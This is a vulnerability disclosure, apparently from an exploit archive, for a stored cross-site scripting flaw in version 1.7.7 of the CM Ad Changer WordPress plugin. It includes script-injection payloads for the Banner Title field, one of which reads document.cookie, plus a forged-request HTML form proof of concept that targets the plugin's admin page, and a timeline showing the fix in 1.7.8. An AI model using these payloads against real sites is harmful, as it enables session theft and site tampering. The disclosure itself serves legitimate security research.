#Exploit Title: CM Ad Changer Plugin XSS
#Date: 9/6/2016
#Exploit Author: Aaditya Purani
#Author Homepage: https://aadityapurani.com
#Vendor Homepage: https://ad-changer.cminds.com
#Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip
(Updated)
#Version: 1.7.7
#Tested on: Wordpress 4.5.2
#Category: Web applications

Description:
An Stored Cross Site Scripting was reported by me to CM Ad Plugins under
which an Unprivileged user can Trigger a Stored XSS to perform malicious
action or any attacker could send a Crafted link which can trigger Stored
XSS

Steps to Produce:

1) Go to CM Ad changers -> Campaigns

2) Create a Campaign. Enter whatever you want in Campaign settings, in the
next tab "Campaign Banners", select an Image in Campaign images and in
Banner Title enter this payload
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>

3) Enter Save & Payload triggers everytime you Return.

Attacker Can Make a Payload File containing the following:

<html>

  <body>
    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer
1.7.7 </h1>
    <form action="
http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}"
method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]"
value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]"
value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg"
/>
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

This will Trigger Stored XSS at banner_title Parameter.

It has been fixed and Version 1.7.8 Released on 9th June
Visit Here:
https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes

---------Timeline----------

1st June : Reported to Vendor Creative Minds
3rd June: Additional Information provided
6th June: Team will able to reproduce
7th June: Fix and confirmed by me
9th June: Publically Fix released & Changelog updated 1.7.8

Regards,
Aaditya Purani